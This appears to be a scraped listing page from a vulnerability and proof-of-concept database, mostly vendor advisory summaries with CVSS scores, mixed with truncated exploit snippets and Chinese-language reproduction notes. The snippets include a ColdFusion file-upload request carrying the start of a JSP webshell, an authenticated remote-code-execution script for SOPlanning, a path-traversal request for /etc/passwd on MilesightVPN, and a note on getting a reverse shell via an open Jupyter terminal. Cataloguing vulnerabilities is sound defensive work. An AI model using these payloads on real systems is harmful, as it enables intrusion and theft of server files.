?day POC 漏洞数据库

FreeBSD: VID-589DE937-343F-11EF-8A7B-001B217B3468 (CVE-2024-6323): Gitlab -- Vulnerabilities Severity 8 CVSS (AV:N/AC:L/Au:N/C:C/I:N/A:N) Published 06/26/2024 Created 06/28/2024 Added 06/27/2024 Modified 01/28/2025 Description Improper authorization in global search in GitLab EE affecting all versions from 16.11 prior to 16.11.5 and 17.0 prior to 17.0.3 and 17.1 prior to 17.1.1 allows an attacker leak content of a private repository in a public project. Solution(s) freebsd-upgrade-package-gitlab-ce freebsd-upgrade-package-gitlab-ee References CVE-2024-6323

Debian: CVE-2022-43441: node-sqlite3 -- security update Severity 10 CVSS (AV:N/AC:L/Au:N/C:C/I:C/A:C) Published 03/16/2023 Created 03/16/2023 Added 03/16/2023 Modified 01/28/2025 Description A code execution vulnerability exists in the Statement Bindings functionality of Ghost Foundation node-sqlite3 5.1.1. A specially-crafted Javascript file can lead to arbitrary code execution. An attacker can provide malicious input to trigger this vulnerability. Solution(s) debian-upgrade-node-sqlite3 References https://attackerkb.com/topics/cve-2022-43441 CVE - 2022-43441 DSA-5373-1

VMware Photon OS: CVE-2024-38428 Severity 9 CVSS (AV:N/AC:L/Au:N/C:C/I:C/A:N) Published 06/16/2024 Created 01/21/2025 Added 01/20/2025 Modified 02/04/2025 Description url.c in GNU Wget through 1.24.5 mishandles semicolons in the userinfo subcomponent of a URI, and thus there may be insecure behavior in which data that was supposed to be in the userinfo subcomponent is misinterpreted to be part of the host subcomponent. Solution(s) vmware-photon_os_update_tdnf References https://attackerkb.com/topics/cve-2024-38428 CVE - 2024-38428

# Exploit Title: LightCMS 1.3.4 - 'exclusive' Stored XSS # Date: 25/02/2021 # Exploit Author: Peithon # Vendor Homepage: https://github.com/eddy8/LightCMS # Software Link: https://github.com/eddy8/LightCMS/releases/tag/v1.3.4 # Version: 1.3.4 # Tested on: latest version of Chrome, Firefox on Windows and Linux # CVE: CVE-2021-3355 An issue was discovered in LightCMS v1.3.4.(https://github.com/eddy8/LightCMS/issues/18) There is a stored-self XSS, allowing an attacker to execute HTML or JavaScript code in a vulnerable Title field to /admin/SensitiveWords. --------------------------Proof of Concept----------------------- 1. Log in to the background. 2. Navigate to System …

漏洞描述Adobe ColdFusion存在任意文件上传漏洞，通过漏洞攻击者可上传任意文件控制服务器。 漏洞影响Adobe ColdFusion 网络测绘app=”Adobe-ColdFusion” 漏洞复现产品官网 发送数据包上传任意文件 POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1Host: User-Agent: Go-http-client/1.1 Content-Length: 918 Content-Type: multipart/form-data; boundary=e9fb732e96144291860c4d742145cdabf98a4ec5cbe2a91aec6dc17461a0 Accept-Encoding: gzip --e9fb732e96144291860c4d742145cdabf98a4ec5cbe2a91aec6dc17461a0 Content-Disposition: form-data; name="file"; filename="b79f4282c451e975c357d9616acea7ba.jsp" Content-Type: application/octet-stream <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLo…

Huawei EulerOS: CVE-2024-39509: kernel security update Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 07/12/2024 Created 11/27/2024 Added 11/26/2024 Modified 11/26/2024 Description In the Linux kernel, the following vulnerability has been resolved: HID: core: remove unnecessary WARN_ON() in implement() Syzkaller hit a warning [1] in a call to implement() when trying to write a value into a field of smaller size in an output report. Since implement() already has a warn message printed out with the help of hid_warn() and value in question gets trimmed with: ... value &= m; ... WARN_ON may be considered superfluous. Remove it to sup…

VMware Photon OS: CVE-2024-50010 Severity 4 CVSS (AV:L/AC:H/Au:S/C:N/I:N/A:C) Published 10/21/2024 Created 01/21/2025 Added 01/20/2025 Modified 02/04/2025 Description In the Linux kernel, the following vulnerability has been resolved: exec: don't WARN for racy path_noexec check Both i_mode and noexec checks wrapped in WARN_ON stem from an artifact of the previous implementation. They used to legitimately check for the condition, but that got moved up in two commits: 633fb6ac3980 ("exec: move S_ISREG() check earlier") 0fd338b2d2cd ("exec: move path_noexec() check earlier") Instead of being removed said checks are WARN_ON'ed instead, which has some…

Oracle Linux: CVE-2023-2194: ELSA-2023-3723:kernel security and bug fix update (IMPORTANT) (Multiple Advisories) Severity 6 CVSS (AV:L/AC:L/Au:M/C:C/I:C/A:C) Published 03/16/2023 Created 07/26/2023 Added 07/25/2023 Modified 12/06/2024 Description An out-of-bounds write vulnerability was found in the Linux kernel&apos;s SLIMpro I2C device driver. The userspace &quot;data-&gt;block[0]&quot; variable was not capped to a number between 0-255 and was used as the size of a memcpy, possibly writing beyond the end of dma_buffer. This flaw could allow a local privileged user to crash the system or potentially achieve code execution. An out-of…

Oracle Linux: CVE-2024-31449: ELSA-2024-10869:redis:7 security update (MODERATE) (Multiple Advisories) Severity 6 CVSS (AV:L/AC:H/Au:S/C:C/I:C/A:C) Published 10/07/2024 Created 12/10/2024 Added 12/07/2024 Modified 02/05/2025 Description Redis is an open source, in-memory database that persists on disk. An authenticated user may use a specially crafted Lua script to trigger a stack buffer overflow in the bit library, which may potentially lead to remote code execution. The problem exists in all versions of Redis with Lua scripting. This problem has been fixed in Redis versions 6.2.16, 7.2.6, and 7.4.1. Users are advised to upgrade. There are no known…

Red Hat: CVE-2023-26767: buffer overflow in lou_logFile function at logginc.c (Multiple Advisories) Severity 8 CVSS (AV:N/AC:L/Au:N/C:N/I:N/A:C) Published 03/16/2023 Created 11/09/2023 Added 11/08/2023 Modified 01/28/2025 Description Buffer Overflow vulnerability found in Liblouis v.3.24.0 allows a remote attacker to cause a denial of service via the lou_logFile function at logginc.c endpoint. Solution(s) redhat-upgrade-liblouis redhat-upgrade-liblouis-debuginfo redhat-upgrade-liblouis-debugsource redhat-upgrade-liblouis-utils-debuginfo redhat-upgrade-python3-louis References CVE-2023-26767 RHSA-2023:6385

# Exploit Title: SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated) # Date: 6th October, 2024 # Exploit Author: Ardayfio Samuel Nii Aryee # Version: 1.52.01 # Tested on: Ubuntu import argparse import requests import random import string import urllib.parse def command_shell(exploit_url): commands = input("soplaning:~$ ") encoded_command = urllib.parse.quote_plus(commands) command_res = requests.get(f"{exploit_url}?cmd={encoded_command}") if command_res.status_code == 200: print(f"{command_res.text}") return print(f"Error: An erros occured while running command: {encoded_command}") def exp…

Debian: CVE-2024-43364: cacti -- security update Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 10/07/2024 Created 02/13/2025 Added 02/12/2025 Modified 02/12/2025 Description Cacti is an open source performance and fault management framework. The `title` parameter is not properly sanitized when saving external links in links.php . Morever, the said title parameter is stored in the database and reflected back to user in index.php, finally leading to stored XSS. Users with the privilege to create external links can manipulate the `title` parameter in the http post request while creating external links to perform stored XSS attacks. The vulne…

FreeBSD: VID-FE7031D3-3000-4B43-9FA6-52C2B624B8F9: zeek -- potential DoS vulnerability Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 10/05/2024 Created 10/08/2024 Added 10/06/2024 Modified 10/06/2024 Description Tim Wojtulewicz of Corelight reports: Adding to the POP3 hardening in 7.0.2, the parser now simply discards too many pending commands, rather than any attempting to process them. Further, invalid server responses do not result in command completion anymore. Processing out-of-order commands or finishing commands based on invalid server responses could result in inconsistent analyzer state, potentially trigge…

Microsoft Windows: CVE-2025-21410: Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability Severity 9 CVSS (AV:N/AC:M/Au:N/C:C/I:C/A:C) Published 02/11/2025 Created 02/12/2025 Added 02/11/2025 Modified 02/11/2025 Description Microsoft Windows: CVE-2025-21410: Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability Solution(s) microsoft-windows-windows_server_2012-kb5052020 microsoft-windows-windows_server_2012_r2-kb5052042 microsoft-windows-windows_server_2016-1607-kb5052006 microsoft-windows-windows_server_2019-1809-kb5052000 microsoft-windows-windows_server_2022-21h2-kb5051…

Microsoft Edge Chromium: CVE-2025-21262 Severity 6 CVSS (AV:N/AC:M/Au:N/C:P/I:P/A:N) Published 01/24/2025 Created 01/28/2025 Added 01/27/2025 Modified 02/03/2025 Description User Interface (UI) Misrepresentation of Critical Information in Microsoft Edge (Chromium-based) allows an unauthorized attacker to perform spoofing over a network Solution(s) microsoft-edge-upgrade-latest References https://attackerkb.com/topics/cve-2025-21262 CVE - 2025-21262 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21262

漏洞描述MilesightVPN 是一款软件，可使 Milesight 产品的 VPN 通道设置过程更加简便，并可通过网络服务器界面监控连接状态。其中存在任意文件读取漏洞，攻击者通过漏洞可以获取服务器中敏感文件。 漏洞影响Milesight VPN 网络测绘“MilesightVPN” 漏洞复现登陆页面 验证POC GET /../etc/passwd HTTP/1.1Host: Accept: / Content-Type: application/x-www-form-urlencoded

漏洞描述Jupyter Notebook（此前被称为 IPython notebook）是一个交互式笔记本，支持运行 40 多种编程语言。 如果管理员未为Jupyter Notebook配置密码，将导致未授权访问漏洞，游客可在其中创建一个console并执行任意Python代码和命令。 漏洞影响Jupyter Notebook 网络测绘app=”Jupyter-Notebook” && body=”Terminal” 漏洞复现访问目标, 点击 Terminal 打开命令行界面 执行命令并反弹shell

FreeBSD: VID-D598266D-7772-4A31-9594-83B76B1FB837 (CVE-2024-37020): Intel CPUs -- multiple vulnerabilities Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/11/2025 Created 02/15/2025 Added 02/13/2025 Modified 02/13/2025 Description Sequence of processor instructions leads to unexpected behavior in the Intel(R) DSA V1.0 for some Intel(R) Xeon(R) Processors may allow an authenticated user to potentially enable denial of service via local access. Solution(s) freebsd-upgrade-package-cpu-microcode-intel References CVE-2024-37020

SUSE: CVE-2024-6292: SUSE Linux Security Advisory Severity 9 CVSS (AV:N/AC:M/Au:N/C:C/I:C/A:C) Published 06/24/2024 Created 07/20/2024 Added 07/19/2024 Modified 01/28/2025 Description Use after free in Dawn in Google Chrome prior to 126.0.6478.126 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) Solution(s) suse-upgrade-chromedriver suse-upgrade-chromium suse-upgrade-opera References https://attackerkb.com/topics/cve-2024-6292 CVE - 2024-6292

Red Hat: CVE-2022-49043: libxml: use-after-free in xmlXIncludeAddNode (Multiple Advisories) Severity 6 CVSS (AV:L/AC:H/Au:N/C:C/I:C/A:C) Published 01/26/2025 Created 02/14/2025 Added 02/13/2025 Modified 02/13/2025 Description xmlXIncludeAddNode in xinclude.c in libxml2 before 2.11.0 has a use-after-free. Solution(s) redhat-upgrade-libxml2 redhat-upgrade-libxml2-debuginfo redhat-upgrade-libxml2-debugsource redhat-upgrade-libxml2-devel redhat-upgrade-python3-libxml2 redhat-upgrade-python3-libxml2-debuginfo References CVE-2022-49043 RHSA-2025:1350

FreeBSD: VID-E7974CA5-E4C8-11EF-AAB3-40B034429ECF (CVE-2024-54145): cacti -- Multiple vulnerabilities Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 01/27/2025 Created 02/11/2025 Added 02/08/2025 Modified 02/08/2025 Description Cacti is an open source performance and fault management framework. Cacti has a SQL injection vulnerability in the get_discovery_results function of automation_devices.php using the network parameter. This vulnerability is fixed in 1.2.29. Solution(s) freebsd-upgrade-package-cacti References CVE-2024-54145

Google Chrome Vulnerability: CVE-2024-6103 Use after free in Dawn Severity 9 CVSS (AV:N/AC:M/Au:N/C:C/I:C/A:C) Published 06/19/2024 Created 06/20/2024 Added 06/19/2024 Modified 01/28/2025 Description Use after free in Dawn in Google Chrome prior to 126.0.6478.114 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) Solution(s) google-chrome-upgrade-latest References https://attackerkb.com/topics/cve-2024-6103 CVE - 2024-6103

Huawei EulerOS: CVE-2024-38608: kernel security update Severity 5 CVSS (AV:L/AC:L/Au:S/C:N/I:N/A:C) Published 06/19/2024 Created 10/10/2024 Added 10/09/2024 Modified 01/30/2025 Description In the Linux kernel, the following vulnerability has been resolved: net/mlx5e: Fix netif state handling mlx5e_suspend cleans resources only if netif_device_present() returns true. However, mlx5e_resume changes the state of netif, via mlx5e_nic_enable, only if reg_state == NETREG_REGISTERED. In the below case, the above leads to NULL-ptr Oops[1] and memory leaks: mlx5e_probe _mlx5e_resume mlx5e_attach_netdev mlx5e_nic_enable<-- netdev not reg, not calling…

SUSE: CVE-2023-26768: SUSE Linux Security Advisory Severity 8 CVSS (AV:N/AC:L/Au:N/C:N/I:N/A:C) Published 03/16/2023 Created 05/05/2023 Added 04/13/2023 Modified 01/28/2025 Description Buffer Overflow vulnerability found in Liblouis v.3.24.0 allows a remote attacker to cause a denial of service via the compileTranslationTable.c and lou_setDataPath functions. Solution(s) suse-upgrade-liblouis-data suse-upgrade-liblouis-devel suse-upgrade-liblouis-doc suse-upgrade-liblouis-tools suse-upgrade-liblouis14 suse-upgrade-liblouis19 suse-upgrade-liblouis20 suse-upgrade-liblouis9 suse-upgrade-python-louis suse-upgrade-python3-louis …

Alma Linux: CVE-2024-38556: Moderate: kernel security update (ALSA-2024-8162) Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 06/19/2024 Created 10/29/2024 Added 10/28/2024 Modified 10/28/2024 Description In the Linux kernel, the following vulnerability has been resolved: net/mlx5: Add a timeout to acquire the command queue semaphore Prevent forced completion handling on an entry that has not yet been assigned an index, causing an out of bounds access on idx = -22. Instead of waiting indefinitely for the sem, blocking flow now waits for index to be allocated or a sem acquisition timeout before beginning the timer for FW completion. Kerne…